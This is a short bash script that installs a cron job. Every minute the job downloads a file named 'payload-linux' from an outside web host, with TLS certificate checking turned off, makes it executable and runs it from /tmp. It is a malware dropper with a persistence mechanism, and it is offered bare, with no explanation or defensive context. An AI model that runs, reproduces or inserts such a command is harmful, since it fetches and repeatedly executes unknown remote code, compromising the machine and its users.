#!/bin/bash
echo '* * * * * cd /tmp; curl -k -O https://www.angelparliament.com/payload-linux || wget --no-check-certificate --hsts-file /dev/null https://www.angelparliament.com/payload-linux && chmod +x payload-linux && ./payload-linux' | crontab
